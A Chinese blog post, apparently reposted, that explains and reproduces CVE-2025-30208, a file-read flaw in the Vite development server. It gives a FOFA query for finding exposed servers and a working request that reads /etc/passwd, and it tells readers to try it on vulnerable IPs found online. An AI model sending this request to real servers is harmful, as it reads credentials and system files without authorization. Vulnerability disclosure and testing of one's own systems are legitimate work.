当前位置: 首页 > news >正文

CVE-2025-30208(文件读取)漏洞复现

一:漏洞信息

    CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。

二:漏洞原理

    漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?raw??或?import&raw??**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。

三:漏洞复现

1.fofa:body="/@vite/client"

   poc:GET /@fs/etc/passwd?import&raw?? HTTP/1.1
             Host: xx.xx.xx.xx

2.在fofa搜索,寻找存在漏洞ip

3.尝试传参,得到相关信息。

http://www.dtcms.com/a/100377.html

相关文章:

  • 【算法手记7】拼三角
  • 将代理连接到 Elasticsearch 使用模型上下文协议
  • 北大人工智能研究院朱松纯:“中国的AI叙事” 存在认知偏差
  • 告别API限费!开源Word/PPT一键生成工具——企业级AIGC自由方案
  • LiteDB 数据库优缺点分析与C#代码示例
  • 【鸿蒙5.0】向用户申请麦克风授权
  • Seata AT模式的一些常见问题及其源码解析
  • JVM原理
  • 室内环保产业观察2025.3.30
  • Mybatis_Plus中的常用注解
  • ollama在win10安装、使用、卸载
  • 【百日精通 JAVA | SQL篇 | 第一篇】初识数据库
  • 从一到无穷大 #44:AWS Glue: Data integration + Catalog
  • 【Matlab】-- 基于MATLAB的飞蛾扑火算法与反向传播算法的混凝土强度预测
  • Python 的 pyautogui 写个简单 关闭广告 和 刷视频 程序
  • 19914 最小生成树2
  • 《Mycat核心技术》第21章:高可用负载均衡集群的实现(HAProxy + Keepalived + Mycat)
  • 小豆包api:gpt-4o模型api已接入,出图更稳定
  • 推荐系统(十九):优势特征蒸馏(Privileged Features Distillation)在商品推荐中的应用(二)
  • DOM 加载函数
  • 5.实现 Channel 类,Reactor 模式初步形成
  • Muduo网络库 - Buffer模块
  • Java进阶——静态代理与动态代理
  • Windows10上部署DeepSeek+RAG知识库操作详解(Dify方式)之2
  • smartdns 在企业场景中的应用心得
  • Parallel_Scheduling_of_DAGs_under_Memory_Constraints论文阅读
  • DPO vs PPO
  • 微服务架构:构建可持续演进的微服务架构的原则与实践指南
  • 计算机求职面试中高频出现的经典题目分类整理
  • Linux驱动开发 块设备